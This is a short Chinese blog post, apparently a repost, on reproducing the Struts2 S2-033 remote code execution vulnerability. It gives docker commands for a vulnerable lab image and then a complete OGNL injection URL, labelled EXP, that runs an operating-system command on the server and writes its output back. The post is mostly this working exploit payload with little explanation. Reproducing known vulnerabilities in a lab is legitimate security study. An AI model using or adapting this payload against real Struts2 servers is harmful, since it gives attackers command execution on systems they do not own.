码迷,mamicode.com
首页 > 其他好文 > 详细

漏洞复现:Struts2 远程代码执行漏洞(S2-033)

时间:2018-01-04 23:20:58      阅读:292      评论:0      收藏:0      [点我收藏+]

标签:response   order   str   inpu   div   log   127.0.0.1   tin   work   

docker pull medicean/vulapps:s_struts2_s2-033

docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-033

EXP:

http://127.0.0.1:8080/orders/4/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=id

  

技术分享图片技术分享图片

参考:http://vulapps.evalbug.com/s_struts2_s2-033/

漏洞复现:Struts2 远程代码执行漏洞(S2-033)

标签:response   order   str   inpu   div   log   127.0.0.1   tin   work   

原文地址:https://www.cnblogs.com/NBeveryday/p/8195140.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!